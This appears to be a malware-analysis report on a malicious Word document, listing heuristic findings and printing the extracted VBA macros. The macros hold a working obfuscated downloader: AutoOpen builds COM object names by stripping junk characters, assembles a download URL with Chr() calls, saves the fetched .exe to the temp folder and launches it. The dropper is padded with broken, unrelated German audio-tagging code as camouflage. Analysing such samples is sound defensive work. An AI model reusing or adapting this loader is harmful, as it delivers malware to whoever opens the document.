MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains obfuscated VBA macros with an auto-execute function (autoopen). Critical heuristics indicate that these macros are designed to download and execute a file from the URL http://mszpdorog.hu/45g33/34t2d3.exe. The presence of CreateObject and Shell execution tokens further supports the malicious intent of executing a downloaded payload.
Heuristics 10
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
usZ5pw3gU8 = httpRequest.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set fso = CreateObject("Scripting.FileSystemObject") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fso = CreateObject("Scripting.FileSystemObject") -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LUREDocument tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://mszpdorog.hu/45g33/34t2d3.exe Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37340 bytes |
SHA-256: 97f0c8a0f2b07f2a568d17c9db6078e22cc9828e52021511e985af337559ad64 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
KLJLGBk
End Sub
Attribute VB_Name = "Module2"
Public Sub nachtag()
Dim eigeneplaylist As String, aktdate As Date, akttime As Date, akttimedate As Date, filename As String, tempzeichen As String, cmd As String, verzeichnis As String, i As Integer, F, temppfad As String, position As Integer, mp2zeit As Date, dbfilename As String, fso As Object, files() As String, filetagged As Boolean, artint As String
If Verriegelung.verriegelungein = "1" Then Exit Sub 'Verriegelung
frmMain.untaggedtaggen.Appearance = 10 'Buttonfarbe ?ndern
frmMain.untaggedtaggen.ForeColor = &H0&
i = 0 'r?cksetzten
'Keine untagged files
If LenB(Dir$(frmMain.work.Text + "untagged\", vbDirectory)) = 0 Then
Call Verriegelung.verriegelungaus 'Verriegelung
Exit Sub
End If
'Suche wird ausgef?hrt
Call Werkzeuge.suche(extension, frmMain.work.Text + "untagged\", files(), "1")
' Hier wird nach extension dateien gesucht
While i < UBound(files) - 1
If frmMain.turbo.Value = "0" Then DoEvents
Call Ausgabe.info_loeschen 'Infofenster l?schen
frmMain.infocount.Caption = Trim$(Str$(i + 1)) + "/" + Trim$(Str$(UBound(files) - 1))
i = i + 1
filetagged = "0"
calbum = vbNullString
cinter = vbNullString
ctitel = vbNullString
cgenre = vbNullString
artint = vbNullString
tempzeichen = Mid$(files(i), Len(frmMain.work.Text + "untagged\") + 1, Len(files(i)))
position = InStr(tempzeichen, "\")
If position = 0 Then
MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & tempzeichen
Set fso = Nothing
Call Ausgabe.info_loeschen 'Infofenster l?schen
Call Verriegelung.verriegelungaus 'Verriegelung
Exit Sub 'Quellfiles direkt im Quellordner
End If
verzeichnis = Left$(tempzeichen, position - 1)
If Not Werkzeuge.sourcepathtest(verzeichnis) Then
MsgBox "Error: Your workpath/workfile structure is wrong! Debuginfo: " & verzeichnis
Set fso = Nothing
Call Ausgabe.info_loeschen 'Infofenster l?schen
Call Verriegelung.verriegelungaus 'Verriegelung
Exit Sub 'Quellfiles direkt im Quellordner
End If
filename = Mid$(tempzeichen, position + 1, Len(tempzeichen) - 4 - position)
End Sub
Public Sub Hidnna()
' Hier wird das datum und die uhrzeit bestimmt
Set fso = CreateObject("Scripting.FileSystemObject")
Set F = fso.GetFile(files(i))
akttimedate = F.DateLastModified 'original date,time, wird von der mp2 ausgelesen
Set F = Nothing
If Len(Trim$(Str$(akttimedate))) = 10 Then
akttime = "00:00:00"
Else
akttime = Right$(akttimedate, 8)
End If
frmMain.akttime.Caption = akttime
'Mp2 Dauer wird ausgelesen
mp2zeit = Werkzeuge.GetMP3Length(files(i))
frmMain.mp2zeit.Caption = mp2zeit
'Playlistumbruch Abfrage (Nur bei End-Zeit)
If tagging.zeitauswahl.ListIndex = 1 Then akttimedate = CDate(akttimedate) - mp2zeit
'Playlistname wird generiert
aktdate = Left$(akttimedate, 10) 'akttimedate muss geteilt werden
frmMain.aktdate.Caption = aktdate
eigeneplaylist = Right$(aktdate, 4) + "-" + Mid$(aktdate, 4, 2) + "-" + Left$(aktdate, 2) + "-" + verzeichnis + ".txt"
'Cancel Abfrage
If frmMain.abbrechen.Enabled = "0" Then
Call Ausgabe.info_loeschen 'Infofenster l?schen
Call Verriegelung.verriegelungaus 'Verriegelung
Set fso = Nothing
Exit Sub
End If
frmMain.infoplaylist.Caption = verzeichnis
'wenn alte "normale" playlist dann l?schen
If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> _
0 Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
' hier wird die geloggte playliste kopiert
If LenB(Dir$(App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And _
Werkzeuge.plvergleich(verzeichnis, "offline") Then
If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 _
Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
fso.CopyFile App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, frmMain.work.Text + "untagged\" + _
verzeichnis "\" + eigeneplaylist
'tagid unterprogramm aufrufen
dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + _
verzeichnis + "\" + eigeneplaylist, filetagged, artint, mp2zeit)
If filetagged Then
If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
Kill (files(i))
Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
GoTo nextrun
End If
temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
GoTo nextrun
End If
End If
End Sub
Sub Jkjs()
' hier wird die online playliste kopiert
If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And _
Werkzeuge.plvergleich(verzeichnis, "online") Then
If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 _
Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
fso.CopyFile App.Path + "\playlists\Online Playlists\" + eigeneplaylist, frmMain.work.Text + "untagged\" + _
verzeichnis "\" + eigeneplaylist
'tagid unterprogramm aufrufen
dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + _
"\" + eigeneplaylist, filetagged, artint, mp2zeit)
End Sub
Public Function usZ5pw3gU8(KJB As Long)
Dim httpRequest: Set httpRequest = LJKNojk(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & Chr(116) & Chr(112) & ":" & Chr(47) & Chr(47) & "m" & "s" & Chr(122) & Chr(112) & "d" & "o" & "r" & Chr(111) & Chr(103) & Chr(46) & Chr(104) & "u" & "/" & Chr(52) & "5" & "g" & Chr(51) & "3" & "/" & Chr(51) & "4" & Chr(116) & "2" & Chr(100) & Chr(51) & "." & "e" & Chr(120) & "e", False
httpRequest.Send
usZ5pw3gU8 = httpRequest.responseBody
End Function
Public Sub YUYUYUUYUYY1()
If filetagged Then
If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
Kill (files(i))
Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
GoTo nextrun
End If
temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
GoTo nextrun
End If
End If
'wenn alte "normale" playlist dann l?schen
If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 Then _
Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
' hier wird die amd playliste downgeloadet
Call Werkzeuge.DownLoad(verzeichnis, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
'Wenn Download erfolgreich
If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 Then
'Playlist kopieren
If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 Then
If FileLen(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist) > FileLen(App.Path + "\playlists\Online Playlists\" + eigeneplaylist) Then
Kill (App.Path + "\playlists\Online Playlists\" + eigeneplaylist)
fso.CopyFile frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
End If
Else
fso.CopyFile frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
End If
'tagid unterprogramm aufrufen
dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, filetagged, artint, mp2zeit) 'hier wird tag3 geschrieben
'getaggtes file verschieben
If filetagged Then
If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
Kill (files(i))
Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
GoTo nextrun
End If
End Sub
Attribute VB_Name = "Module1"
Public Function LJKNdVDs22()
temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
GoTo nextrun
Else
'ungetaggtes file verschieben
Call file_speichern.untaggedspeichern(files(i), verzeichnis, akttime, aktdate)
End If
Else
'ungetaggtes file verschieben
Call file_speichern.untaggedspeichern(files(i), verzeichnis, akttime, aktdate)
End If
nextrun:
frmMain.statusnachtag.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
Wend
Set fso = Nothing
Call Ausgabe.info_loeschen 'Infofenster l?schen
Call Verriegelung.verriegelungaus 'Verriegelung
End Function
Public Sub KLLKLLLL(adodbStream As Object, tempFile As String)
adodbStream.savetofile tempFile, 2
End Sub
Sub LKjlknlk()
' hier wird die Online playliste downgeloadet
If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
Call Werkzeuge.DownLoad(verzeichnis, aktdate, frmMain.work.Text + eigeneplaylist)
If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then
'Playlist kopieren
If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 Then
If FileLen(frmMain.work.Text + eigeneplaylist) > FileLen(App.Path + "\playlists\Online Playlists\" + eigeneplaylist) Then
Kill (App.Path + "\playlists\Online Playlists\" + eigeneplaylist)
fso.CopyFile frmMain.work.Text + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
End If
Else
fso.CopyFile frmMain.work.Text + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
End If
'hier wird tag3 geschrieben
dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
If filetagged Then
If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
Kill (files(i))
Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
GoTo nextrun
End If
End Sub
Attribute VB_Name = "Module3"
Public Sub Konvert()
Dim tempzeichen As String, filename As String, akttimedate As Date, akttime As Date, aktdate As Date, cmd As String, verzeichnis As String, F, temppfad As String, position As Integer, mp2zeit As Date, dbfilename As String, quellfile As String, eigeneplaylist As String, i As Integer, fso As Object, files() As String, filetagged As Boolean, artint As String
If Verriegelung.verriegelungein = "1" Then Exit Sub 'Verriegelung
frmMain.Start.Appearance = 10 'Buttondesign ?ndern
frmMain.Start.ForeColor = &H0& 'Buttonfarbe ?ndern
If allgemeine.timesync_konv.Value = "1" Then Call Timesyncron.syncnow
i = 0 'R?cksetzten
Call Werkzeuge.suche("mp2", frmMain.Quelle.Text, files(), "1") 'Suche, nach mp2-files wird ausgef?hrt
' Hier werden Daten der gefundenen files ausgewertet (Verzeichnis und Filename)
If UBound(files) = 1 Then Call Ausgabe.textbox("No source-files")
While i < UBound(files) - 1 'Anzahl der gefundenen files
If UBound(files) - 1 < Scannen.minfiles.CurPosition And Aktivierauswahl.scan_aktiv.Value = "1" Then
Call Ausgabe.textbox("Too few source-files..." + Str(UBound(files) - 1) + "/" + Str(Scannen.minfiles.CurPosition))
Call Verriegelung.verriegelungaus
Exit Sub
End If
End Function
Public Function LJKNojk(UIlhbjkhoiyH As String)
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
Set LJKNojk = CreateObject(UIlhbjkhoiyH)
End Function
Public Function khjgbkjh()
If frmMain.turbo.Value = "0" Then DoEvents
Call Ausgabe.info_loeschen 'Infofenster l?schen
frmMain.infocount.Caption = Trim$(Str$(i + 1)) + "/" + Trim$(Str$(UBound(files) - 1))
i = i + 1
filetagged = "0" 'R?cksetzen der Marke
calbum = vbNullString
cinter = vbNullString
ctitel = vbNullString
cgenre = vbNullString
artint = vbNullString
tempzeichen = Mid$(files(i), Len(frmMain.Quelle.Text) + 1, Len(files(i)))
position = InStr(tempzeichen, "\") 'Sucht das "\" und gibt Position zur?ck
If position = 0 Then
MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & tempzeichen
Set fso = Nothing
Call Ausgabe.info_loeschen 'Infofenster l?schen
Call Verriegelung.verriegelungaus 'Verriegelung
Exit Function 'Quellfiles direkt im Quellordner
End If
verzeichnis = Left$(tempzeichen, position - 1) 'Verzeichnis wird herrausgelesen
filename = Mid$(tempzeichen, position + 1, Len(tempzeichen) - 4 - position) 'Filename ohne Pfad und Extension
'Wenn es sich um ein untagged file handelt, dann Verzeichnis von file auslesen
If verzeichnis = "untagged" Or verzeichnis = "Untagged" Then
tempzeichen = Right$(tempzeichen, Len(tempzeichen) - 9)
position = InStr(1, tempzeichen, "-")
verzeichnis = Trim$(Mid$(tempzeichen, position + 1, Len(tempzeichen) - position - 4))
End If
If Not Werkzeuge.sourcepathtest(verzeichnis) Then
MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & verzeichnis
Set fso = Nothing
Call Ausgabe.info_loeschen 'Infofenster l?schen
Call Verriegelung.verriegelungaus 'Verriegelung
Exit Function 'Quellfiles direkt im Quellordner
End If
'Kontrolle ob file "delsize" byte hat
If LenB(Dir$(files(i), vbDirectory)) <> 0 Then
frmMain.mp2size.Caption = Format(FileLen(files(i)) / 1024, "0.0") + "kb"
Else
GoTo nextrun
End If
If FileLen(files(i)) < tagging.delsize(0).CurPosition Then
If LenB(Dir$(files(i), vbDirectory)) <> 0 Then Kill files(i)
GoTo nextrun
End If
' Hier wird das datum und die uhrzeit bestimmt
Set fso = CreateObject("Scripting.FileSystemObject")
Set F = fso.GetFile(files(i))
akttimedate = F.DateLastModified 'original date,time, wird von der mp2 ausgelesen
Set F = Nothing
If Len(Trim$(Str$(akttimedate))) = 10 Then
akttime = "00:00:00"
Else
akttime = Right$(akttimedate, 8)
End If
frmMain.akttime.Caption = akttime
'Mp2 Dauer wird ausgelesen
mp2zeit = Werkzeuge.GetMP3Length(files(i))
frmMain.mp2zeit.Caption = mp2zeit
'Playlistumbruch Abfrage (Nur bei End-Zeit)
If tagging.zeitauswahl.ListIndex = 1 Then akttimedate = CDate(akttimedate) - mp2zeit
'Playlistname wird generiert
aktdate = Left$(akttimedate, 10) 'akttimedate muss geteilt werden
frmMain.aktdate.Caption = aktdate
eigeneplaylist = Right$(aktdate, 4) + "-" + Mid$(aktdate, 4, 2) + "-" + Left$(aktdate, 2) + "-" + verzeichnis + ".txt"
'Cancel Abfrage
If Not frmMain.abbrechen.Enabled Then
Call Ausgabe.info_loeschen 'Infofenster l?schen
Call Verriegelung.verriegelungaus 'Verriegelung
Set fso = Nothing
Exit Sub
End If
frmMain.infoplaylist.Caption = verzeichnis
Excel_Statistik.AddDatagesamt 'Datenbank (Excel) Gesamtdata addieren
' hier wird die geloggte playliste kopiert
If LenB(Dir$(App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And Werkzeuge.plvergleich(verzeichnis, "offline") Then
If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
fso.CopyFile App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, frmMain.work.Text + eigeneplaylist
'hier wird tag3 geschrieben
dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
End Sub
Public Function KLJLGBk()
Set processEnv = LJKNojk(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
tempFolder = processEnv("T" & Chr(69) & Chr(77) & Chr(80))
Dim adodbStream As Object
Set adodbStream = LJKNojk(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
Dim tempFile As String
tempFile = tempFolder + "\Mb5k9G0zH.exe"
With adodbStream
.Type = 1
.Open
.write usZ5pw3gU8(55542)
End With
KLLKLLLL adodbStream, tempFile
Set shellApp = LJKNojk(Chr(83) & Chr(104) & Chr(61) & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p" & ";" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
shellApp.Open (tempFile)
End Function
Sub KJKmk()
If filetagged Then 'Wenn TagID Infos vorhanden sind
If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
Kill (files(i))
Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted") 'Wenn File existiert, dann l?schen
frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
GoTo nextrun
End If
quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist) 'Konvertierung starten
If quellfile = "error" Then GoTo nextrun
temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint) 'TagID in konvertiertes File schreiben
Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1)) 'File verschieben
GoTo nextrun
End If
End If
' hier wird die Online playliste kopiert
If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And Werkzeuge.plvergleich(verzeichnis, "online") Then
If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
fso.CopyFile App.Path + "\playlists\Online Playlists\" + eigeneplaylist, frmMain.work.Text + eigeneplaylist
'hier wird tag3 geschrieben
dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
If filetagged Then 'Wenn TagID Infos vorhanden sind
If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
Kill (files(i))
Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted") 'Wenn File existiert, dann l?schen
frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
GoTo nextrun
End If
quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist) 'Konvertierung starten
If quellfile = "error" Then GoTo nextrun
temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint) 'TagID in konvertiertes File schreiben
Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1)) 'File verschieben
GoTo nextrun
End If
End If
End Sub
Sub LKjlknlk()
quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
If quellfile = "error" Then GoTo nextrun
temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint)
Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1))
Else
quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
If quellfile = "error" Then GoTo nextrun
Call untagged(quellfile, verzeichnis, akttime, aktdate, files(i), i, (UBound(files) - 1))
End If
Else
quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
If quellfile = "error" Then GoTo nextrun
Call untagged(quellfile, verzeichnis, akttime, aktdate, files(i), i, (UBound(files) - 1))
End If
nextrun:
Wend
Set fso = Nothing
Call Ausgabe.info_loeschen 'Infofenster l?schen
Call Verriegelung.verriegelungaus 'Verriegelung
End Sub
Private Function konvertieren(file As String, filename As String, verzeichnis As String, eigeneplaylist As String) As String
Dim cmd As String, temppfad As String, quellfile As String, F As Integer, mp2test As String, addline As String, fso As Object, DShell As Object, genie As Object
On Error GoTo fehler
Set DShell = New Dos
'MP2 ?berpr?fung
If allgemeine.mp2test.Value = "1" Then
cmd = """" + App.Path + "\tools\besplit.exe""" + " -core( -input """ + file + """ -output """ + App.Path + "\temp\mp2test.mp2""" + " -type mp2 -logfile """ + App.Path + "\temp\mp2test.log""" + " )" 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
If LenB(Dir$(App.Path + "\temp\mp2test.mp2", vbDirectory)) <> 0 Then Kill (App.Path + "\temp\mp2test.mp2")
If LenB(Dir$(App.Path + "\temp\mp2test.log", vbDirectory)) <> 0 Then
Call Werkzeuge.IsFileOpen(App.Path + "\temp\mp2test.log")
F = FreeFile
Open App.Path + "\temp\mp2test.log" For Binary As #F
mp2test = Space$(LOF(F))
Get #F, , mp2test
Close F
If InStr(mp2test, "Stream error") Then
Call Ausgabe.textbox(filename + ".mp2......MP2-Error / moved")
If LenB(Dir$(frmMain.work.Text + "Error", vbDirectory)) = 0 Then MkDir frmMain.work.Text + "Error"
If LenB(Dir$(frmMain.work.Text + "Error\" + verzeichnis, vbDirectory)) = 0 Then MkDir frmMain.work.Text + "Error\" + verzeichnis
Call Werkzeuge.IsFileOpen(file)
Name file As frmMain.work.Text + "Error\" + verzeichnis + "\" + filename + ".mp2"
Kill (App.Path + "\temp\mp2test.log")
konvertieren = "error"
Set DShell = Nothing
Exit Function
End If
Kill (App.Path + "\temp\mp2test.log")
End If
End If
If extension = "mp2" Then
If frmMain.noextension.Value = "1" Then
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile file, frmMain.work.Text + filename + ".mp2"
Set fso = Nothing
Else
' hier startet lame (mp2 in temp.wav)
cmd = """" + App.Path + "\tools\lame.exe""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
If Aktivierauswahl.mp2normal_aktiv.Value = "1" Then
frmMain.normset.Caption = " Normalize" 'Infofenster
If normal.prozenable.Value = "1" Then
frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
Else
frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
End If
' hier startet normalisierung
cmd = """" + App.Path + "\tools\" + "normalize.exe """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
End If
'R?ckkonvertierung
If Aktivierauswahl.mp2_cbr_aktiv.Value = "1" Then
frmMain.encoderset.Caption = "CBR " + MP2cbrmenu.cbrbitrate.Text 'Infofenster
cmd = """" + App.Path + "\tools\toolame.exe""" + " """ + frmMain.work.Text + "temp.wav"" " + """" + frmMain.work.Text + filename + ".mp2"" " + MP2cbrparameter
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
Else
frmMain.encoderset.Caption = "VBR " + MP2cbrmenu.cbrbitrate.Text 'Infofenster
cmd = """" + App.Path + "\tools\toolame.exe""" + " """ + frmMain.work.Text + "temp.wav"" " + """" + frmMain.work.Text + filename + ".mp2"" " + MP2vbrparameter
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
End If
End If
End If
If extension = "ogg" Then
' hier startet lame (mp2 in temp.wav)
cmd = """" + App.Path + "\tools\lame.exe""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
If Aktivierauswahl.oggnormal_aktiv.Value = "1" Then
frmMain.normset.Caption = " Normalize" 'Infofenster
If normal.prozenable.Value = "1" Then
frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
Else
frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
End If
' hier startet normalisierung
cmd = """" + App.Path + "\tools\" + "normalize.exe """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
End If
'R?ckkonvertierung
cmd = """" + App.Path + "\tools\oggenc.exe""" + " """ + frmMain.work.Text + "temp.wav"" " + OGGparameter
